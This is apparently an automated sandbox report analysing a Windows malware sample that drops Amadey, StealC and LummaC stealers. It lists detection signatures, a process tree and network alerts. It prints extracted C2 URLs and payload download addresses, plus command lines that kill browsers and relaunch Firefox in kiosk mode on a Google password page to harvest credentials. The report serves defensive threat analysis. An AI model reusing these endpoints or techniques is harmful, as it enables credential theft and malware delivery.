Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1565518
MD5:	27a3277f6daec8e2369a88cea407fb46
SHA1:	c7da43b9bc1a51aa28cda592d8266e17057ab6b7
SHA256:	ba82209b941924aeb6196fac31a5e2d13193f49be26163683bf29a293b3fcec0
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected Credential Flusher

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Hides threads from debuggers

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies windows update settings

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 27A3277F6DAEC8E2369A88CEA407FB46)

skotes.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 27A3277F6DAEC8E2369A88CEA407FB46)

skotes.exe (PID: 7696 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 27A3277F6DAEC8E2369A88CEA407FB46)

skotes.exe (PID: 2312 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 27A3277F6DAEC8E2369A88CEA407FB46)

SxQyhJr.exe (PID: 7396 cmdline: "C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe" MD5: 0F325C99B7B2585A266CF50D88F134C8)

AppLaunch.exe (PID: 2720 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" MD5: 89D41E1CF478A3D3C2C701A27A5692B2)

WerFault.exe (PID: 7516 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 1148 MD5: C31336C1EFC2CCB44B4326EA793040F2)

a6f0d09f38.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe" MD5: A9A9F7A7B9ED25C8DF3E4676A11593F3)

b5da647ae3.exe (PID: 5500 cmdline: "C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe" MD5: BB0C42D0421512D8F7796F5253543456)

6e1fbaaba5.exe (PID: 7984 cmdline: "C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe" MD5: 0D9D9AC3AED513438004818F468DE528)

taskkill.exe (PID: 7992 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 1028 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 8080 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 4960 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6840 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 6984 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

8b82d73f70.exe (PID: 6920 cmdline: "C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe" MD5: 47AA764406BA64383AC50E4101F34474)

98a7b9f337.exe (PID: 3520 cmdline: "C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe" MD5: 52FCB84B6A36A8E28A1B56F2603EDF23)

firefox.exe (PID: 6752 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 8136 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 2324 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2244 -prefMapHandle 2236 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91716696-7f11-4900-9d33-9e5d096728d3} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb6d310 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 1852 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dd50345-4e1a-4a0d-ac3a-34bdbd555491} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb43510 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 2812 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5080 -prefMapHandle 5076 -prefsLen 33185 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7dd9b6f-0496-49cf-b3a6-fd4ff652e245} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1def0e90f10 utility MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}

Threatname: LummaC

{"C2 url": "https://atten-supporse.biz:443/api", "Build Version": "LOGS11--LiveTraffi"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1701196442.00000000049F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000002.2452245090.0000000006240000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000006.00000003.2306646203.0000000004D20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.1741706182.00000000006E1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000002.2641325721.00000000002C1000.00000040.00000001.01000000.0000000F.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000003.1688680503.0000000004860000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000F.00000003.2670852779.0000000001953000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
00000001.00000002.1729011202.00000000006E1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.1671498988.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000E.00000003.2600123548.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1711619647.0000000000701000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: SxQyhJr.exe PID: 7396	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: SxQyhJr.exe PID: 7396	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: AppLaunch.exe PID: 2720	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: a6f0d09f38.exe PID: 7620	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: a6f0d09f38.exe PID: 7620	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: a6f0d09f38.exe PID: 7620	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: a6f0d09f38.exe PID: 7620	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: b5da647ae3.exe PID: 5500	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: b5da647ae3.exe PID: 5500	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 6e1fbaaba5.exe PID: 7984	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.SxQyhJr.exe.6240000.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
6.2.skotes.exe.6e0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.skotes.exe.6e0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.skotes.exe.6e0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.700000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2312, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a6f0d09f38.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2312, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a6f0d09f38.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:24.859421+0100	2028371	3	Unknown Traffic	192.168.2.4	49797	104.21.16.9	443	TCP
2024-11-30T04:06:27.032683+0100	2028371	3	Unknown Traffic	192.168.2.4	49803	104.21.16.9	443	TCP
2024-11-30T04:06:29.484704+0100	2028371	3	Unknown Traffic	192.168.2.4	49810	104.21.16.9	443	TCP
2024-11-30T04:06:32.319859+0100	2028371	3	Unknown Traffic	192.168.2.4	49815	104.21.16.9	443	TCP
2024-11-30T04:06:35.144899+0100	2028371	3	Unknown Traffic	192.168.2.4	49823	104.21.16.9	443	TCP
2024-11-30T04:06:37.710613+0100	2028371	3	Unknown Traffic	192.168.2.4	49828	104.21.16.9	443	TCP
2024-11-30T04:06:40.313541+0100	2028371	3	Unknown Traffic	192.168.2.4	49836	104.21.16.9	443	TCP
2024-11-30T04:06:50.299338+0100	2028371	3	Unknown Traffic	192.168.2.4	49877	104.21.16.9	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:25.684942+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49797	104.21.16.9	443	TCP
2024-11-30T04:06:27.849102+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49803	104.21.16.9	443	TCP
2024-11-30T04:06:51.504070+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49877	104.21.16.9	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:25.684942+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49797	104.21.16.9	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:27.849102+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49803	104.21.16.9	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:53.021084+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	49894	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:16.203948+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49780	185.215.113.43	80	TCP
2024-11-30T04:06:25.100048+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49798	185.215.113.43	80	TCP
2024-11-30T04:06:33.598920+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49818	185.215.113.43	80	TCP
2024-11-30T04:06:40.788127+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49839	185.215.113.43	80	TCP
2024-11-30T04:06:50.884742+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49879	185.215.113.43	80	TCP
2024-11-30T04:07:03.724639+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49919	185.215.113.43	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:33.520392+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49815	104.21.16.9	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:33.224907+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49816	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:05.447692+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49753	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:14.776447+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49759	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:09.904046+0100	2803305	3	Unknown Traffic	192.168.2.4	49765	31.41.244.11	80	TCP
2024-11-30T04:06:17.754931+0100	2803305	3	Unknown Traffic	192.168.2.4	49782	185.215.113.16	80	TCP
2024-11-30T04:06:26.611235+0100	2803305	3	Unknown Traffic	192.168.2.4	49800	185.215.113.16	80	TCP
2024-11-30T04:06:35.109143+0100	2803305	3	Unknown Traffic	192.168.2.4	49822	185.215.113.16	80	TCP
2024-11-30T04:06:42.311733+0100	2803305	3	Unknown Traffic	192.168.2.4	49840	185.215.113.16	80	TCP
2024-11-30T04:06:52.347504+0100	2803305	3	Unknown Traffic	192.168.2.4	49892	31.41.244.11	80	TCP
2024-11-30T04:07:05.303329+0100	2803305	3	Unknown Traffic	192.168.2.4	49924	31.41.244.11	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-30T04:06:40.347872+0100	2843864	1	A Network Trojan was detected	192.168.2.4	49836	104.21.16.9	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206?	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/6802601040/SxQyhJr.exe	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000002.00000003.1701196442.00000000049F0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: a6f0d09f38.exe.7620.13.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": "https://atten-supporse.biz:443/api", "Build Version": "LOGS11--LiveTraffi"}
Source: b5da647ae3.exe.5500.14.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 55%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_cc3844a9-b

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49927 version: TLS 1.2

Source:	Binary string: webauthn.pdb source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
